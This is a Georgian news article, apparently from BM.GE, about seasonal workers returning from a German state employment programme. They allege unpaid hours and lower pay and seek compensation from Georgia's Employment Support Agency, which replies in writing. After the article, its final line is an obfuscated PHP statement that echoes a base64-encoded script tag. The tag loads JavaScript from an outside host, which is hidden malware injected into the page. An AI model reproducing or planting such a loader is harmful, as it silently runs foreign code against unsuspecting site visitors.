celsiusi
ავერსი საქკაბელი
გერმანიაში სეზონურად დასაქმებულები დასაქმების ხელშეწყობის სააგენტოს უჩივიან და კომპენსაციის სახით 18 000 ლარს ითხოვენ. შესაბამისი ინფორმაცია BM.GE-ის გერმანიიდან ვადაზე ადრე დაბრუნებულმა დასაქმებულებმა მიაწოდეს.
 
მათი განმარტებით, სახელმწიფო პროგრამით გათვალისწინებული პირობები ადგილზე დამსაქმებლებმა არ შეასრულეს, მათ შორის პრობლემა იყო ანაზღაურების საკითხიც, რომელიც იმაზე ნაკლები აღმოჩნდა, ვიდრე ხელშეკრულებით იყო გაწერილი.
 
“იმ კომპანიაში, სადაც ვმუშაობდით, იყო მარწყვის რეალიზაციის პრობლემა. დამსაქმებელი ვერ გვამუშავებდა. დღის განმავლობაში 4 საათზე მეტს ვერ ვმუშაობდი. არადა კონტრაქტში ნათლად გვეწერა, რომ დღის განმავლობაში 8 საათი უნდა გვემუშავა და შესაბამისი ანაზღაურებაც უნდა აგვეღო. ამ 4 საათში რომ დავიანგარიშეთ, ჯამში ვიღებდით 12-15 ევროს, არადა მხოლოდ 1 საათში უნდა გამოგვემუშავებინა 9,5 ევრო. დღის განმავლობაში კი 4 საათის ნაცვლად 8 საათი მაინც უნდა გვემუშავა", - აცხადებს პროგრამის ბენეფიციარი ჯაბა ჩაჩანიძე.
 
BM.GE დაუკავშირდა დასაქმების ხელშეწყობის სააგენტოსაც. როგორც სამსახურში აცხადებენ, პრობლემა მხოლოდ ერთ ჯგუფთან მიმართებით შეიქმნა, სხვა შემთხვევაში მათი განმარტებით, პრობლემები დამსაქმებელსა და დასაქმებულს შორის არ ყოფილა.
 
წერილობით პასუხში ასევე ვკითხულობთ, რომ გერმანიასა და საქართველოს შორის არსებული შეთანხმებით მსგავს პრობლემურ შემთხვევებში მხარეების ინტერესების გათვალისწინებით გადაწყვეტილებებს გერმანული მხარე იღებდა, ხოლო ქართული მხარის ფუნქცია მხოლოდ ის იყო, რომ არსებული პრობლემების თაობაზე დროულად მოეხდინა გერმანული მხარის ინფორმირება, რაც მათი განმარტებით, ამ ჯგუფის შემთხვევაში დაუყოვნებლივ მოხდა.
 
“დამსაქმებლის მხრიდან კონტრაქტით გათვალისწინებული პირობების შეუსრულებლობის ფაქტი მხოლოდ ერთი ჯგუფის შემთხვევაში დაფიქსირდა, რაც საზოგადოებისათვის ცნობილია. სხვა ჯგუფის წევრთა უმრავლესობა კი საქართველოში ბრუნდება კონტრაქტით გათვალისწინებული ვადის ამოწურვის შემდგომ, დამატებითი ფინანსური რესურსით და გამოცდილებით. რაც შეეხება ცალკეულ შემთხვევებს, ბუნებრივია, ამ პროცესშიც, ისევე როგორც ზოგადად შრომით ურთიერთობებში მსოფლიოს ნებისმიერ ქვეყანაში ხდება, არის ინდივიდუალური შემთხვევები, როდესაც დამსაქმებლისა და დასაქმებულის ინტერესები და მოლოდინები არ ემთხვევა ერთმანეთს ან არის ჯანმრთელობის გაუარესების შემთხვევა, რის საფუძველზეც, დასაქმებულსა და დამსაქმებელს შორის წყდება შრომითი ურთიერთობა", - ამბობენ დასაქმების ხელშეწყობის სააგენტოში.
 
ცნობისთვის, გერმანიაში დასაქმების სახელმწიფო პროგრამას მისი დაანონსებისთანავე ძალიან დიდი გამოხმაურება ჰქონდა. მოთხოვნა ადგილობრივებისგან ისეთი მაღალი იყო, რომ გარკვეული პერიოდის შემდეგ გერმანიის მხარემ გადაწყვეტილება მიიღო, კვოტა გაეზარდა.
 
პროგრამით 500 ადამიანის ნაცვლად 5000 პირს უნდა ესარგებლა. თუმცა როგორც დღეს ჩვენთვის ცნობილია, ამ ეტაპზე 2021 წლის აპრილიდან 2021 წლის 16 სექტემბრამდე გერმანიაში სეზონურ სამუშაოზე სახელმწიფოთაშორისი შეთანხმებით, მხოლოდ 229 საქართველოს მოქალაქემ ისარგებლა.
958
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");